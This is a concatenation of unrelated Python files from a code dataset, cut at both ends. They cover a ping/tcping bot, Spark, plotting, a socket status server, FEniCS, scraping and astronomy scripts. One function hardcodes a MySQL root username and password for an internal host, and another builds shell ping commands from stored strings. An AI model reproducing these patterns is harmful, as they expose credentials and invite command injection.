text.split(' ')\n ta = df[df['商戶'] == customer].reset_index(drop=True)\n if (ta.empty) & (request != 'LIST'):\n return_text = BadRequest_ans\n else:\n IP = [i for i in ta[ta.ip != '']['ip']]\n Domain = [i.replace('(socket)', '') for i in ta[ta.domain != '']['domain']]\n Domain_raw = [i for i in ta[ta.domain != '']['domain']]\n #ping\n if request in ['PING']: \n cmd_first = 'ping '\n cmds = IP.copy()\n cmds.extend(Domain_raw)\n cmds = [cmd_first+ i for i in cmds]\n dx = pd.DataFrame({'req': 'PING',\n 'cmd': cmds,\n 'sep':seperation})\n return_text_df = multithread(dx)\n return_text_df = pd.DataFrame(return_text_df, columns=['cmd', 'result'])\n dx = dx.merge(return_text_df, on='cmd', how='left')\n\n return_text = '\\n'.join([dx.cmd[i]+ dx.result[i]+ dx.sep[i] for i in range(len(dx))])\n\n elif request in ['LIST']:\n df2 = df.copy()\n df2 = df2[df['商戶'] != ''].reset_index(drop=True)\n if customer != 'ALL':\n condition = [True if customer in i else False for i in df2['商戶']]\n else:\n condition = [True for i in df2['商戶']] \n \n show = df2[condition]['商戶'].unique() \n return_text = '######List結果######\\n{show}'.format(show = str(list(show)))\n #tcping \n elif request in ['TCPING']:\n cmd_first = 'tcping '\n cmds = Domain_raw\n cmds = [cmd_first+ i+ ' 443' for i in cmds]\n cmds_final = []\n group, cnt = [], 0\n for x in cmds:\n if '(socket)' in x:\n cmds_final.extend([x, x.replace('443', '80'), x.replace('443', '9081')])\n group.extend([cnt] *3)\n else:\n cmds_final.extend([x, x.replace('443', '80')])\n group.extend([cnt] *2)\n cnt += 1\n dx = pd.DataFrame({'req': 'TCPING',\n 'cmd': cmds_final,\n 'group':group})\n return_text_df = multithread(dx)\n return_text_df = pd.DataFrame(return_text_df, columns=['cmd', 'result'])\n dx = dx.merge(return_text_df, on='cmd', how='left')\n dx.loc[:, 'idx'] = dx.index\n dx_g = list(dx.groupby(['group'])['idx'].idxmax())\n dx.loc[:, 'sep'] = ''\n for i in dx_g:\n dx.loc[i, 'sep'] = seperation\n return_text = '\\n'.join([dx.cmd[i]+ dx.result[i]+ dx.sep[i] for i in range(len(dx))])\n \n elif request == 'IP': \n return_text = '\\n'.join(IP) \n else:\n return_text = BadRequest_ans\n except:\n return_text = BadRequest_ans \n return return_text\n\n\ndef trans_text(raw):\n text = raw.upper()\n if text == 'LIST':\n text = 'ALL LIST'\n else:\n text = text \n c, r = text.split(' ')\n return text, c, r\n\n\ndef InsertLog(table, user, c, r, return_text):\n mydb = mysql.connector.connect(host=\"172.16.124.220\",\n user=\"root\",\n password=\"1q2w3e4r5t\",\n database=\"cs_detection\",\n charset='utf8')\n mycursor = mydb.cursor()\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.000')\n sql = \"INSERT INTO {table} (USER, createtime, cust, request, response) VALUES (%s, %s, %s, %s, %s)\".format(table=table)\n val = (user, now_time, c, r, return_text)\n mycursor.execute(sql, val)\n mydb.commit()\n mydb.close()\n mycursor.close()","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"185974838","text":"#dse spark-submit pyspark_inventory.py\n\n\nfrom pyspark.sql import Row, SQLContext\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql.functions import lit\n\n# simple python code to see a spark-submit\n\n\nconf = SparkConf().setAppName(\"Extract UIDs\")\n\nsc = SparkContext(conf=conf)\nsqlContext = SQLContext(sc)\n\n\ndef getData():\n items_sold_by_store_ = sqlContext.read.format(\"org.apache.spark.sql.cassandra\").options(table=\"items_sold_by_store\", keyspace=\"atwater\").load()\n items_sold_by_store_.registerTempTable(\"my_temp_sales\")\n items_sold_by_store = sqlContext.sql(\"select store_id, date, product_id, -quantity as quantity from my_temp_sales where date < '2018-08-17'\")\n items_sold_by_store.groupby(['store_id','product_id']).agg({'quantity': 'sum'}).withColumnRenamed(\"sum(quantity)\", \"quantity\").withColumn('date', lit('2018-08-16')).write.format(\"org.apache.spark.sql.cassandra\").options(table=\"store_inventory\", keyspace = \"atwater\").save(mode =\"append\")\n\n sc.stop()\n\n\nif __name__ == \"__main__\":\n getData()\n","sub_path":"pyspark_inventory.py","file_name":"pyspark_inventory.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305854891","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef encode(img_file: str, msg: str) -> None:\n if sys.getsizeof(msg) > 160: raise ValueError('Not support message')\n msg_list = ''.join(msg.split())\n\n (result, raw_msg) = ([], [])\n pointer = 300\n img = open(img_file, 'rb+')\n for word in msg_list: raw_msg += list(format(ord(word), 'b'))\n img.seek(pointer)\n img_bytes = list(img.read(len(raw_msg)))\n result += [img_bytes[_] - int(raw_msg[_]) for _ in range(0, len(img_bytes))]\n img.seek(pointer)\n for _ in result: img.write(chr(_).encode('ISO-8859-1'))\n img.flush()\n img.close()\n\nencode(input(\"Input filename: \"), input(\"Input your message: \"))\n","sub_path":"lab10.py","file_name":"lab10.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9241996","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mplc\nimport seaborn as sns \nimport argparse\n\nfrom datareader import DataReader as Data\nfrom myutils import msg\n\nparser = argparse.ArgumentParser(description=\"Plot of the group distributions for an item.\")\nparser.add_argument('item', help='number of item to plot')\nparser.add_argument('-g', help='group number to plot (all by default)', default=None, type=int)\nparser.add_argument('-a', help='plot all ratings together ignoring groups', action=\"store_true\")\nparser.add_argument('--heat', help='plot as 2D heatmap (defualt histogram)', action=\"store_true\")\n\ndef barplot_rating_dist(item, single=False, group=None, savefig=None):\n\n\twith msg(\"plotting rating distribution\"):\n\t\tratings = Data.get_ratings()[:,item]\n\t\tnyms = Data.get_nyms()\n\n\t\tplt.xlabel('rating')\n\t\tplt.ylabel('no. ratings')\n\t\tstep = 1\n\t\tbins = np.arange(step/2, 5 + 1.5*step, step)\n\t\thist = lambda d, **kwargs: plt.hist(d, bins=bins, rwidth=step*0.75, **kwargs)\n\t\tif group is not None: \n\t\t\tplt.title(f'Item {item}, group {group} rating distribution')\n\t\t\thist(ratings[nyms[group]].data)\n\t\telif single: \n\t\t\tplt.title(f'Item {item} rating distribution')\n\t\t\thist(ratings.data)\n\t\telse:\n\t\t\tplt.title(f'Item {item}, all groups rating distributions')\n\t\t\tfor nym_n, nym in enumerate(nyms):\n\t\t\t\thist(ratings[nym].data, histtype='step', linewidth=2 ,label=f'group {nym_n}')\n\t\t\tplt.legend()\n\t\tif savefig is None:\n\t\t\tplt.show()\n\t\telse:\n\t\t\twith msg(f'Saving figure to \"{savefig}\"'):\n\t\t\t\tplt.savefig(savefig, dpi=150)\n\t\t\tplt.clf()\n\ndef heatmap_rating_dist(item):\n\t# def plot_rating_dists_across_groups(ratings, item, groups, savefig=False):\n\twith msg(\"plotting rating distribution\"):\n\t\tratings = Data.get_ratings()[:,item]\n\t\tnyms = Data.get_nyms()\n\n\t\tdata = np.zeros((10, len(nyms)))\n\t\tfor nym_n, nym in enumerate(nyms):\n\t\t\tunique, count = np.unique(ratings[nym].data, return_counts=True)\n\t\t\tfor rating, count in dict(zip(unique, count)).items():\n\t\t\t\tdata[int(2*rating - 1), nym_n] = count\n\n\t\tax = sns.heatmap(data)\n\t\tax.set(\n\t\t\ttitle=\"Distribution of item #{} ratings by group\".format(int(item)),\n\t\t\txlabel=\"group number\", \n\t\t\tylabel=\"rating\", \n\t\t\tyticklabels=np.linspace(0.5, 5, 10))\n\t\t\n\t\tplt.show()\n\nif __name__ == \"__main__\":\n\targs = parser.parse_args()\n\tif (args.heat): heatmap_rating_dist(args.item)\n\telse: barplot_rating_dist(args.item, single=args.a, group=args.g)\n","sub_path":"plot_item_dist.py","file_name":"plot_item_dist.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"62638624","text":"# server.py\nimport time\nfrom threading import Thread\nimport threading \nimport os\nimport sys\nfrom time import sleep\n\nIP_ADDRES = '89.40.126.143'\n\n#-------------------------------------------------------------\n# PROGRESS BAR\n#-------------------------------------------------------------\n# Print iterations progress\ndef printProgress (iteration, total, prefix = '', suffix = '', decimals = 1, barLength = 100):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n barLength - Optional : character length of bar (Int)\n \"\"\"\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percents = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '█' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\ndef start_bar():\n # \n # Sample Usage\n # \n # make a list\n items = list(range(0, 10))\n i = 0\n l = len(items)\n \n # Initial call to print 0% progress\n printProgress(i, l, prefix = 'Progress:', suffix = 'Complete', barLength = 50)\n for item in items:\n # Do stuff...\n sleep(1)\n # Update Progress Bar\n i += 1\n printProgress(i, l, prefix = 'Progress:', suffix = 'Complete', barLength = 50)\n\n\n\n#-------------------------------------------------------------------------------\n# THREAD TO SHOW TEXT ABOUT WAITING FOR NEW REQUEST\n#-------------------------------------------------------------------------------\n\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self):\n show()\ndef show():\n os.system('clear')\n global exitFlag\n while exitFlag:\n time.sleep(1)\n print (\"Waiting for new request... \")\n time.sleep(1)\n os.system('clear')\n accept(ip,port)\n\ndef accept(_ip, _port):\n print('Accepting connection from ' + _ip + ':' + _port+ ' Time: '+ time.ctime())\n\n#-------------------------------------------------------------------------------\n# NGINX STATUS SEND TO CLIENT\n#-------------------------------------------------------------------------------\ndef nginx_status_send(conn):\n p = os.popen(\"sudo service nginx status | grep '[A]ctive' | awk '{print $2}'\",\"r\")\n out = ''\n while 1:\n line = p.readline()\n if not line: break\n out+=line\n\n # print(\"Result of processing {} is: {}\".format(input_from_client, out))\n\n vysl = out.encode(\"utf8\") # encode the result string\n conn.sendall(vysl) # send it to client\n \n#-------------------------------------------------------------------------------\n# QUIT SEND TO CLIENT\n#-------------------------------------------------------------------------------\ndef quit_send(conn):\n end_message = \"stop\"\n encode = end_message.encode(\"utf8\") # encode the result string\n conn.sendall(encode) # send it to client\n conn.close() # close connection\n print('Connection ' + ip + ':' + port + \" ended\")\n time.sleep(5)\n\n # Create new threads\n thread1 = myThread(1, \"Thread-1\", 1)\n\n # Start new Threads\n thread1.start()\n global exitFlag\n exitFlag = 1\n#-------------------------------------------------------------------------------\n# DATE SEND TO CLIENT\n#-------------------------------------------------------------------------------\n\ndef date_send(conn):\n p = os.popen('date',\"r\")\n out = ''\n while 1:\n line = p.readline()\n if not line: break\n out+=line\n # print(\"Result of processing {} is: {}\".format(input_from_client, out))\n\n vysl = out.encode(\"utf8\") # encode the result string\n conn.sendall(vysl) # send it to client\n\n\n#-------------------------------------------------------------------------------------\n# RESPOND TO CLIENT AND CLOSE TE CONNECTION AND RUN 'WAITING' TEXT\n#-------------------------------------------------------------------------------------\n\ndef client_thread(conn, ip, port, MAX_BUFFER_SIZE = 4096):\n \n welcome_message = \"What do you want to do?? \\n Select:\\n 'N' => Nginx status. \\n 'D' => Actual Date. \\n 'Q' => Quit connect. \\n : \"\n encode = welcome_message.encode(\"utf8\") # encode the result string\n conn.sendall(encode) # send it to client\n\n while True:\n\n # the input is in bytes, so decode it\n input_from_client_bytes = conn.recv(MAX_BUFFER_SIZE)\n\n # MAX_BUFFER_SIZE is how big the message can be\n # this is test if it's sufficiently big\n siz = sys.getsizeof(input_from_client_bytes)\n if siz >= MAX_BUFFER_SIZE:\n print(\"The length of input is probably too long: {}\".format(siz))\n\n # decode input and strip the end of line\n input_from_client = input_from_client_bytes.decode(\"utf8\").rstrip()\n if ((input_from_client == 'n') | (input_from_client == 'N')):\n nginx_status_send(conn)\n elif ((input_from_client == 'q') | (input_from_client == 'Q')):\n quit_send(conn)\n break\n elif ((input_from_client == 'd') | (input_from_client == 'D')):\n date_send(conn)\n else:\n message = \"\\n Wrong command!!! \\n\"\n encode = message.encode(\"utf8\") # encode the result string\n conn.sendall(encode) # send it to client\n time.sleep(1)\n\n\n ######## start progress bar #####\n # start_bar() <-----\n#--------------------------------------------------------------------------\n# START SERVER, CREATE SOCKET, BIND AND START LISTENING\n#--------------------------------------------------------------------------\ndef start_server():\n\n import socket\n soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # this is for easy starting/killing the app\n soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n print('Socket created')\n\n try:\n #SOCKET IP AND PORT\n soc.bind((IP_ADDRES, 12345))\n\n print('Socket bind complete')\n except socket.error as msg:\n import sys\n print('Bind failed. Error : ' + str(sys.exc_info()))\n sys.exit()\n\n #Start listening on socket\n soc.listen(10)\n print('Socket now listening')\n\n # this will make an infinite loop needed for \n # not reseting server for every client\n while True: \n conn, addr = soc.accept()\n global ip, port, exitFlag\n ip, port = str(addr[0]), str(addr[1])\n exitFlag = 0\n if (port == '12345'):\n accept(ip, port)\n try:\n Thread(target=client_thread, args=(conn, ip, port)).start()\n except:\n print(\"Terible error!\")\n import traceback\n traceback.print_exc()\n soc.close()\n\n\nprint (\"Start : %s\" % time.ctime())\nstart_server() \n \n\n","sub_path":"Python_server/Python_server/Python_server.py","file_name":"Python_server.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339332755","text":"from __future__ import print_function\r\nfrom fenics import *\r\nfrom ufl import nabla_div\r\nimport math\r\n\r\n#==============================================================\r\n#\tDimensional parameters\r\n#==============================================================\r\nlength = 1.0\r\nW = 0.2\r\nH = 0.2\r\n\r\nmu = 300e6\r\nrho = 5e3\r\nlambda_ = 400e6\r\n\r\ntraction_applied = -1e4\r\n\r\n\r\n#==============================================================\r\n#\tDimensionless parameters\r\n#==============================================================\r\nyoungs = (mu*(3.0*lambda_+2.0*mu))/(lambda_+mu)\r\nbar_speed = math.sqrt(youngs/rho)\r\n\r\nl_nd = length/length\r\nw_nd = W/length\r\nh_nd = H/length\r\n\r\nt_char = length/bar_speed\r\nt = 0\r\nt_i = 0.5\r\ndt = 0.1\r\nnum_steps = 100\r\n\r\nmu_nd = mu/youngs\r\nlambda_nd = lambda_/youngs\r\n\r\ntraction_nd = traction_applied/youngs\r\n\r\n#============================================================\r\nmesh = BoxMesh(Point(0,0,0),Point(l_nd,w_nd,h_nd),20,6,6)\r\nV = VectorFunctionSpace(mesh,'P',1)\r\n\r\ntol = 1E-14\r\nboundary_left = 'near(x[0],0)'\r\nbc_left = DirichletBC(V,Constant((0,0,0)),boundary_left)\r\n\r\n\r\nu_n = interpolate(Constant((0.0,0.0,0.0)),V)\r\nu_n_1 = interpolate(Constant((0.0,0.0,0.0)),V)\r\n\r\nT_n = Expression(('near(x[0],l) ? (t <= t_i ? A : 0.0) : 0.0','0.0','0.0'), degree=1, l=l_nd, A=traction_nd, t=t, t_i=t_i)\r\n\r\ndef epsilon(u):\r\n\treturn 0.5*(nabla_grad(u) + nabla_grad(u).T)\r\n\r\ndef sigma(u):\r\n\treturn lambda_nd*nabla_div(u)*Identity(d) + mu_nd*(epsilon(u) + epsilon(u).T)\r\n\r\nu = TrialFunction(V)\r\nd = u.geometric_dimension()\r\nv = TestFunction(V)\r\n\r\nf = Constant((0,0,0))\r\n\r\nF = (dt*dt)*inner(sigma(u),epsilon(v))*dx + dot(u,v)*dx - (dt*dt)*dot(f,v)*dx - (dt*dt)*dot (T_n,v)*ds - 2.0*dot(u_n,v)*dx + dot(u_n_1,v)*dx\r\na,L = lhs(F), rhs(F)\r\n\r\nxdmffile_u = XDMFFile('results/solution.xdmf')\r\nxdmffile_s = XDMFFile('results/stress.xdmf')\r\n\r\nu = Function(V)\r\n\r\n\r\nfor n in range(num_steps):\r\n\tprint(\"time = %.2f\" % t)\r\n\tprint(\"It's tensile time\")\r\n\tprint(\"Ohhowoheohoweheoh\")\r\n\tT_n.t = t\r\n\tsolve(a == L, u, bc_left)\r\n\r\n\txdmffile_u.write(u*length,t)\r\n\tW = TensorFunctionSpace(mesh, \"Lagrange\", 1)\r\n\tstress = lambda_*nabla_div(u)*Identity(d) + mu*(epsilon(u) + epsilon(u).T)\r\n\txdmffile_s.write(project(stress,W),t)\r\n\r\n\tt+=dt\r\n\tu_n_1.assign(u_n)\r\n\tu_n.assign(u)","sub_path":"Lab/2019.02.20 Lab/tensile_time.py","file_name":"tensile_time.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"238998978","text":"from selenium import webdriver\r\n\r\ndriver=webdriver.Chrome(executable_path=\"C:\\Drivers\\chromedriver_win32\\chromedriver.exe\")\r\n\r\ndriver.get(\"https://phptravels.com/demo/\") #opens up the website\r\n\r\n#driver.save_screenshot(\"C:\\Screenshot\\homePage.png\") #capturing the screenshot of the specified page and saving it to the target location #accepts jpg, png etc extension\r\n\r\ndriver.get_screenshot_as_file(\"C:\\Screenshot\\homePage2.png\") #capturing the screenshot and saving it to the target location #this command only accepts png extension\r\n\r\ndriver.close()\r\n\r\n","sub_path":"captureScreen.py","file_name":"captureScreen.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"422399907","text":"# please download elevation model from https://fgd.gsi.go.jp/download/menu.php (login required)\n# code based on https://www.gis-py.com/entry/2016/01/10/163027\n\nimport re\nimport numpy as np\nfrom os.path import join,relpath\nfrom glob import glob\nimport shelve\n\ndef generate_elevation():\n elevation_data = []\n \n #XMLを格納するフォルダ\n path = \"./DL\"\n #ファイル名取得\n files = [relpath(x,path) for x in glob(join(path,'**/*.xml'), recursive=True)]\n \n # 検索パターンをコンパイル\n r1 = re.compile(\"(.+) (.+)\")\n r2 = re.compile(\"(.+) (.+)\")\n r3 = re.compile(\"(.+) (.+)\")\n r4 = re.compile(\"(.+) (.+)\")\n \n for index_files, fl in enumerate(files):\n xmlFile = join(path,fl)\n #XMLを開く\n with open(xmlFile, \"r\", encoding = \"utf-8\") as f:\n for ln in f:\n m = r1.search(ln)\n #検索パターンとマッチした場合、スタートポジションを格納\n if m != None:\n lry = float(m.group(1))\n ulx = float(m.group(2))\n break\n \n \n for ln in f:\n m = r2.search(ln)\n \n #検索パターンとマッチした場合、スタートポジションを格納\n if m != None:\n uly = float(m.group(1))\n lrx = float(m.group(2))\n break\n \n \n for ln in f:\n m = r3.search(ln)\n #検索パターンとマッチした場合、縦横の領域を格納\n if m != None:\n xlen = int(m.group(1)) + 1\n ylen = int(m.group(2)) + 1\n break\n \n startx = starty = 0\n \n for ln in f:\n m = r4.search(ln)\n #検索パターンとマッチした場合、スタートポジションを格納\n if m != None:\n startx = int(m.group(1))\n starty = int(m.group(2))\n break\n \n #numpy用にデータを格納しておく\n with open(xmlFile, \"r\", encoding = \"utf-8\") as f:\n src_document = f.read()\n lines = src_document.split(\"\\n\")\n num_lines = len(lines)\n l1 = None\n l2 = None\n for i in range(num_lines):\n if lines[i].find(\"\") != -1:\n l1 = i + 1\n break\n for i in range(num_lines - 1, -1, -1):\n if lines[i].find(\"\") != -1:\n l2 = i - 1\n break\n \n #セルのサイズを算出\n psize_x = (lrx - ulx) / xlen\n psize_y = (uly - lry) / ylen\n \n narray = np.empty((ylen, xlen), np.float32)\n narray.fill(0)\n \n num_tuples = l2 - l1 + 1\n \n #スタートポジションを算出\n start_pos = starty*xlen + startx\n \n i = 0\n sx = startx\n \n #標高を格納\n for y in range(starty, ylen):\n for x in range(sx, xlen):\n if i < num_tuples:\n vals = lines[i + l1].split(\",\")\n if len(vals) == 2 and vals[1].find(\"-99\") == -1:\n narray[y][x] = float(vals[1])\n i += 1\n else:\n break\n if i == num_tuples: break\n sx = 0\n \n elevation_data.append([ulx, uly, psize_x, psize_y, narray])\n print(\"%s/%s startx%s starty%s sizex%s sizey%s\" % (index_files, len(files) - 1, ulx, uly, psize_x, psize_y))\n \n shel = shelve.open('elevation.shel')\n shel['elevation'] = elevation_data\n shel.close()\n","sub_path":"elevation.py","file_name":"elevation.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"340471747","text":"import networkx as nx\nimport numpy as np\nimport sys\nfrom scipy.io import mmread\nfrom scipy.sparse import coo_matrix\nnp.set_printoptions(threshold=sys.maxsize)\n\nif len(sys.argv) != 2:\n print(\"Usage: python3 ./hits.py \")\n exit()\n\ngraph_coo = mmread(sys.argv[1])\nprint(\"Loading COO matrix\")\nprint(graph_coo.nnz, \" edges\")\n\ngraph_nx = nx.DiGraph(graph_coo)\n\nprint(\"Creating NetworkX Graph\")\nprint(\"NetworkX is Directed: \", nx.is_directed(graph_nx))\nprint(\"NetworkX Graph has \", graph_nx.number_of_edges(), \" edges\")\n\nmax_iter = 10000\ntol = 1e-6\nhubs_nx, auths_nx = nx.hits(graph_nx, max_iter, tol, normalized=True)\n\n# Numpy implementation\nhrank = np.zeros((graph_coo.shape[0], 1))\narank = np.zeros((graph_coo.shape[0], 1))\n\nhrank += 1/graph_coo.shape[0]\narank += 1/graph_coo.shape[0]\n\nfor _ in range(0, max_iter):\n hlast = hrank\n alast = arank\n hrank = np.zeros((graph_coo.shape[0], 1))\n arank = np.zeros((graph_coo.shape[0], 1))\n\n for edge in range(0, graph_coo.nnz):\n src = int(graph_coo.row[edge])\n dest = int(graph_coo.col[edge])\n arank[dest] += hlast[src]\n hrank[src] += alast[dest]\n\n # Normalize\n hrank = hrank / np.max(hrank)\n arank = arank / np.max(arank)\n\n err = np.sum(np.absolute(hrank-hlast))\n if err < tol:\n break\n\nhrank = hrank / np.linalg.norm(hrank, ord=1)\narank = arank / np.linalg.norm(arank, ord=1)\n\nhubs_np = {}\nauths_np = {}\n\nfor i in range(0, graph_coo.shape[0]):\n hubs_np[i] = hrank[i]\n auths_np[i] = arank[i]\n\nprint(\"Hubs: \")\nfor key, val in sorted(hubs_nx.items(), key=lambda x: x[1], reverse=True):\n print(key, val, hubs_nx[key])\nprint(\"Authorities: \")\nfor key, val in sorted(auths_nx.items(), key=lambda x: x[1], reverse=True):\n print(key, val, auths_nx[key])","sub_path":"examples/hits/hits.py","file_name":"hits.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"424281144","text":"import numpy as np\nimport pandas as pd\nimport random as rand\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom scipy.stats import multivariate_normal\nfrom sys import maxint\nfrom sklearn import svm\n\nSV = svm.SVC()\n\nx1= [3,2,4,1,2,4,4]\nx2= [4,2,4,4,1,3,1]\nalpha=[0,1,1,0,1,1,0]\nclify=[1,1,1,1,-1,-1,-1]\nred = \"red\"\nblue = \"blue\" \nweights=np.zeros(2)\n \ncolor=[red,red,red,red,blue,blue,blue]\ndata = {'x':x1,'y':x2,'labelColor':color, 'class':clify}\ndf = pd.DataFrame(data)\nprint(df)\nline = SV.fit(df.ix[:,['x','y']], df['labelColor'])\nprint(line.support_)\nfor i in range(len(x1)):\n weights[0]=weights[0]+(clify[i]*(alpha[i]*x1[i]))\n weights[1]=weights[1]+(clify[i]*(alpha[i]*x2[i]))\nweights[0] =2\nweights[1] = 1.5\n\nb = -1*(x1[6]*weights[0]+x2[6]*weights[1]) \nb = -1.5\nprint(weights)\nprint(b)\n\n\nplt.scatter(df['x'], df['y'], c=df[\"labelColor\"])\nxs = [0,1,2,3,4]\nys = []\nfor i in range(len(xs)):\n ys.append((1/weights[1])*(xs[i]*weights[0])+b)\n \nplt.plot(xs,ys)\nplt.show()","sub_path":"hw3/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354130638","text":"#!/usr/bin/env python3\nimport cgi, os\nfrom os import environ\nimport sqlite3, http.cookies\nfrom common import *\nimport cgitb; cgitb.enable() # activates a special exception handler \n # that'll display reports in browser\n\ncgitb.enable()\n\ncookstr = environ.get('HTTP_COOKIE')\ncookies = http.cookies.SimpleCookie(cookstr)\ncookies.load(cookstr)\ntry:\n sidcook = cookies['sid'].value\n if auth(sidcook) == True:\n form = cgi.FieldStorage(keep_blank_values=True) # to get at submitted data.\n # keep_bla... - to keep ignored empty form field\n fileitem = form['file'] # a nested FieldStorage instance holds the file\n title = form.getvalue(\"title\")\n selfname = fileitem.filename\n upload(fileitem, title, selfname)\n else:\n redirect(SLOGIN)\nexcept KeyError:\n redirect(SLOGIN)","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"5650503","text":"from github import Github\r\nimport requests, csv, json\r\n\r\n#Limitando tanto os usuários quanto os repositórios, devido ao limite de requisições da API do GitHub.\r\n#h = Github()\r\n#repo = h.get_user(\"Microsoft\").get_repo(\"vscode\").contributors_url\r\nr = requests.get(\"https://api.github.com/repos/Microsoft/vscode/contributors?page=1&per_page=10\")\r\nwith open(\"crawlerContributorsVSCODE\", 'w') as f:\r\n writeit = csv.writer(f, delimiter=',', lineterminator='\\n')\r\n repoJSON = json.loads(r.text)\r\n for item in repoJSON:\r\n pk = item['id']\r\n name = item['login']\r\n output = str(pk) + \",\" + name\r\n writeit.writerow([pk] + [name])\r\n print(output)\r\n","sub_path":"CrawlerContributors.py","file_name":"CrawlerContributors.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"467572461","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\nfrom astropy.time import Time, TimeDelta\nfrom ..utils.time import TIME_REF_FERMI\n\n__all__ = [\n 'plot_fermi_3fgl_light_curve',\n]\n\n\ndef plot_time_difference_distribution(time, ax=None):\n \"\"\"Plot event time difference distribution.\n\n Parameters\n ----------\n time : `~astropy.time.Time`\n Event times (must be sorted)\n ax : `~matplotlib.axes.Axes` or None\n Axes\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axes\n \"\"\"\n import matplotlib.pyplot as plt\n\n if ax is None:\n ax = plt.gcf()\n\n td = time[1:] - time[:-1]\n\n # TODO: implement!\n raise NotImplementedError\n\n\ndef plot_fermi_3fgl_light_curve(source_name, time_start=None, time_end=None, ax=None):\n \"\"\"Plot flux as a function of time for a fermi 3FGL object.\n\n Parameters\n ----------\n source_name : str\n The 3FGL catalog name of the object to plot\n time_start : `~astropy.time.Time` or str or None\n Light curve start time. If None, use the earliest time in the catalog.\n time_end : `~astropy.time.Time` or str or None\n Light curve end time. If None, use the latest time in the catalog.\n ax : `~matplotlib.axes.Axes` or None\n Axes\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axes\n\n Examples\n --------\n Plot a 3FGL lightcurve:\n\n .. plot::\n :include-source:\n\n from gammapy.time import plot_fermi_3fgl_light_curve\n plot_fermi_3fgl_light_curve('3FGL J0349.9-2102',\n time_start='2010-01-01',\n time_end='2015-02-02')\n\n import matplotlib.pyplot as plt\n plt.show()\n \"\"\"\n from ..catalog import fetch_fermi_catalog\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n\n ax = plt.gca() if ax is None else ax\n\n if time_start is None:\n time_start = Time('2008-08-02T00:33:19')\n else:\n time_start = Time(time_start)\n\n if time_end is None:\n time_end = Time('2012-07-31T22:45:47')\n else:\n time_end = Time(time_end)\n\n fermi_met_start = (time_start - TIME_REF_FERMI).sec\n\n fermi_met_end = (time_end - TIME_REF_FERMI).sec\n\n fermi_cat = fetch_fermi_catalog('3FGL')\n\n catalog_index = np.where(fermi_cat[1].data['Source_Name'] == source_name)[0][0]\n\n hist_start = fermi_cat[3].data['Hist_Start']\n time_index_start = np.where(hist_start >= fermi_met_start)[0][0]\n\n # The final entry is the end of the last bin, so no off by one error\n time_index_end = np.where(hist_start <= fermi_met_end)[0][-1] + 1\n\n time_start = hist_start[time_index_start: time_index_end]\n time_end = np.roll(time_start, -1)\n\n time_diff = 0.5 * (time_end - time_start)\n\n # Trim because there is one more bin edge than there is bin mid point\n time_diff = time_diff[0:-1]\n\n # Midpoints of each bin.\n time_mid = time_start[0:-1] + time_diff\n\n cat_row = fermi_cat[1].data[catalog_index]\n\n flux_history = cat_row['Flux_History'][time_index_start: time_index_end]\n\n flux_history_lower_bound = cat_row['Unc_Flux_History'][time_index_start: time_index_end, 0]\n flux_history_upper_bound = cat_row['Unc_Flux_History'][time_index_start: time_index_end, 1]\n flux_history_lower_bound = abs(flux_history_lower_bound)\n\n time_mid = (TIME_REF_FERMI + TimeDelta(time_mid, format='sec'))\n\n time_at_bin_start = time_mid - TimeDelta(time_diff, format='sec')\n\n time_at_bin_end = time_mid + 